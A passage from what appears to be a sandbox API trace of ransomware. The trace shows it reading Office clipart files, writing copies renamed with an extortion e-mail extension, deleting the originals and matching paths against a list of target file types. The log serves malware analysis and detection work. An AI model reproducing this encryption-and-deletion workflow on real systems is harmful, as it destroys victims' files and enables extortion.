lpNewFilePointer=0x0) returned 1 [0068.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00046_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00046_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0068.399] GetLastError () returned 0x0 [0068.399] ReadFile (in: hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x486, lpOverlapped=0x0) returned 1 [0068.401] WriteFile (in: hFile=0x368, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x490, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x490, lpOverlapped=0x0) returned 1 [0068.402] ReadFile (in: hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0068.402] WriteFile (in: hFile=0x368, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0068.402] SetEndOfFile (hFile=0x368) returned 1 [0068.402] CloseHandle (hObject=0x368) returned 1 [0068.402] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.402] SetEndOfFile (hFile=0x388) returned 1 [0068.403] CloseHandle (hObject=0x388) returned 1 [0068.403] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00046_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.403] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00046_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00046_.wmf")) returned 1 [0068.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 68 [0068.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 68 [0068.407] lstrlenW (lpString=".doc") returned 4 [0068.407] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.407] lstrlenW (lpString=".docx") returned 5 [0068.407] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.407] lstrlenW (lpString=".pdf") returned 4 [0068.407] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.407] lstrlenW (lpString=".xls") returned 4 [0068.407] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.407] lstrlenW (lpString=".xlsx") returned 5 [0068.407] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.407] lstrlenW (lpString=".ppt") returned 4 [0068.407] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 68 [0068.407] lstrlenW (lpString=".zip") returned 4 [0068.407] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.407] lstrlenW (lpString=".rar") returned 4 [0068.407] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.407] lstrlenW (lpString=".bz2") returned 4 [0068.407] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.407] lstrlenW (lpString=".7z") returned 3 [0068.407] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 68 [0068.407] lstrlenW (lpString=".dbf") returned 4 [0068.407] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 68 [0068.407] lstrlenW (lpString=".1cd") returned 4 [0068.407] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 68 [0068.407] lstrlenW (lpString=".jpg") returned 4 [0068.407] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.408] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.408] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.408] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00118_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00118_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0068.408] GetLastError () returned 0x0 [0068.408] ReadFile (in: hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x318, lpOverlapped=0x0) returned 1 [0068.417] WriteFile (in: hFile=0x368, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x320, lpOverlapped=0x0) returned 1 [0068.418] ReadFile (in: hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0068.418] WriteFile (in: hFile=0x368, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0068.418] SetEndOfFile (hFile=0x368) returned 1 [0068.418] CloseHandle (hObject=0x368) returned 1 [0068.418] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.418] SetEndOfFile (hFile=0x388) returned 1 [0068.419] CloseHandle (hObject=0x388) returned 1 [0068.419] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00118_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.419] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00118_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00118_.wmf")) returned 1 [0068.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 68 [0068.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 68 [0068.422] lstrlenW (lpString=".doc") returned 4 [0068.422] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.422] lstrlenW (lpString=".docx") returned 5 [0068.422] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.422] lstrlenW (lpString=".pdf") returned 4 [0068.422] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.422] lstrlenW (lpString=".xls") returned 4 [0068.423] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.423] lstrlenW (lpString=".xlsx") returned 5 [0068.423] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.423] lstrlenW (lpString=".ppt") returned 4 [0068.423] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 68 [0068.423] lstrlenW (lpString=".zip") returned 4 [0068.423] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.423] lstrlenW (lpString=".rar") returned 4 [0068.423] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.423] lstrlenW (lpString=".bz2") returned 4 [0068.423] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.423] lstrlenW (lpString=".7z") returned 3 [0068.423] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 68 [0068.423] lstrlenW (lpString=".dbf") returned 4 [0068.423] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 68 [0068.423] lstrlenW (lpString=".1cd") returned 4 [0068.423] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 68 [0068.423] lstrlenW (lpString=".jpg") returned 4 [0068.423] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.423] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.423] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.424] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00204_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00204_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0068.424] GetLastError () returned 0x0 [0068.424] ReadFile (in: hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x738, lpOverlapped=0x0) returned 1 [0068.440] WriteFile (in: hFile=0x368, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x740, lpOverlapped=0x0) returned 1 [0068.441] ReadFile (in: hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0068.441] WriteFile (in: hFile=0x368, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0068.441] SetEndOfFile (hFile=0x368) returned 1 [0068.441] CloseHandle (hObject=0x368) returned 1 [0068.441] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.441] SetEndOfFile (hFile=0x388) returned 1 [0068.442] CloseHandle (hObject=0x388) returned 1 [0068.442] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00204_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.442] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00204_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00204_.wmf")) returned 1 [0068.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 68 [0068.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 68 [0068.442] lstrlenW (lpString=".doc") returned 4 [0068.442] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.443] lstrlenW (lpString=".docx") returned 5 [0068.443] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.443] lstrlenW (lpString=".pdf") returned 4 [0068.443] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.443] lstrlenW (lpString=".xls") returned 4 [0068.443] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.443] lstrlenW (lpString=".xlsx") returned 5 [0068.443] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.443] lstrlenW (lpString=".ppt") returned 4 [0068.443] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 68 [0068.443] lstrlenW (lpString=".zip") returned 4 [0068.443] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.443] lstrlenW (lpString=".rar") returned 4 [0068.443] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.443] lstrlenW (lpString=".bz2") returned 4 [0068.443] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.443] lstrlenW (lpString=".7z") returned 3 [0068.443] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 68 [0068.443] lstrlenW (lpString=".dbf") returned 4 [0068.443] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 68 [0068.443] lstrlenW (lpString=".1cd") returned 4 [0068.443] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 68 [0068.443] lstrlenW (lpString=".jpg") returned 4 [0068.443] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.445] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.445] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.445] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00346_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00346_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0068.445] GetLastError () returned 0x0 [0068.446] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x2b8, lpOverlapped=0x0) returned 1 [0068.446] WriteFile (in: hFile=0x2c0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x2c0, lpOverlapped=0x0) returned 1 [0068.447] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0068.447] WriteFile (in: hFile=0x2c0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0068.447] SetEndOfFile (hFile=0x2c0) returned 1 [0068.447] CloseHandle (hObject=0x2c0) returned 1 [0068.448] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.448] SetEndOfFile (hFile=0x340) returned 1 [0068.448] CloseHandle (hObject=0x340) returned 1 [0068.448] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00346_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.449] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00346_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00346_.wmf")) returned 1 [0068.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 68 [0068.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 68 [0068.449] lstrlenW (lpString=".doc") returned 4 [0068.449] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.449] lstrlenW (lpString=".docx") returned 5 [0068.449] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.449] lstrlenW (lpString=".pdf") returned 4 [0068.449] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.449] lstrlenW (lpString=".xls") returned 4 [0068.449] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.449] lstrlenW (lpString=".xlsx") returned 5 [0068.449] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.449] lstrlenW (lpString=".ppt") returned 4 [0068.449] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 68 [0068.449] lstrlenW (lpString=".zip") returned 4 [0068.449] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.449] lstrlenW (lpString=".rar") returned 4 [0068.449] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.449] lstrlenW (lpString=".bz2") returned 4 [0068.450] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.450] lstrlenW (lpString=".7z") returned 3 [0068.450] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 68 [0068.450] lstrlenW (lpString=".dbf") returned 4 [0068.450] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 68 [0068.450] lstrlenW (lpString=".1cd") returned 4 [0068.450] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 68 [0068.450] lstrlenW (lpString=".jpg") returned 4 [0068.450] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.450] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.450] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.450] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00351_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00351_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0069.041] GetLastError () returned 0x0 [0069.041] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x788, lpOverlapped=0x0) returned 1 [0069.054] WriteFile (in: hFile=0x380, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x790, lpOverlapped=0x0) returned 1 [0069.055] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0069.055] WriteFile (in: hFile=0x380, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0069.055] SetEndOfFile (hFile=0x380) returned 1 [0069.055] CloseHandle (hObject=0x380) returned 1 [0069.055] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.055] SetEndOfFile (hFile=0x340) returned 1 [0069.056] CloseHandle (hObject=0x340) returned 1 [0069.056] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00351_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.056] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00351_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00351_.wmf")) returned 1 [0069.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 68 [0069.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 68 [0069.057] lstrlenW (lpString=".doc") returned 4 [0069.057] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.057] lstrlenW (lpString=".docx") returned 5 [0069.057] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0069.057] lstrlenW (lpString=".pdf") returned 4 [0069.057] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.057] lstrlenW (lpString=".xls") returned 4 [0069.057] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.057] lstrlenW (lpString=".xlsx") returned 5 [0069.057] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0069.057] lstrlenW (lpString=".ppt") returned 4 [0069.057] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 68 [0069.057] lstrlenW (lpString=".zip") returned 4 [0069.057] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.057] lstrlenW (lpString=".rar") returned 4 [0069.057] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.057] lstrlenW (lpString=".bz2") returned 4 [0069.057] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.057] lstrlenW (lpString=".7z") returned 3 [0069.057] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 68 [0069.057] lstrlenW (lpString=".dbf") returned 4 [0069.057] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 68 [0069.057] lstrlenW (lpString=".1cd") returned 4 [0069.057] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 68 [0069.057] lstrlenW (lpString=".jpg") returned 4 [0069.057] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.062] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.062] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.062] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086424.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086424.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0069.063] GetLastError () returned 0x0 [0069.063] ReadFile (in: hFile=0x38c, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x4278, lpOverlapped=0x0) returned 1 [0069.072] WriteFile (in: hFile=0x370, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x4280, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x4280, lpOverlapped=0x0) returned 1 [0069.073] ReadFile (in: hFile=0x38c, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0069.073] WriteFile (in: hFile=0x370, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0069.073] SetEndOfFile (hFile=0x370) returned 1 [0069.073] CloseHandle (hObject=0x370) returned 1 [0069.073] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.073] SetEndOfFile (hFile=0x38c) returned 1 [0069.074] CloseHandle (hObject=0x38c) returned 1 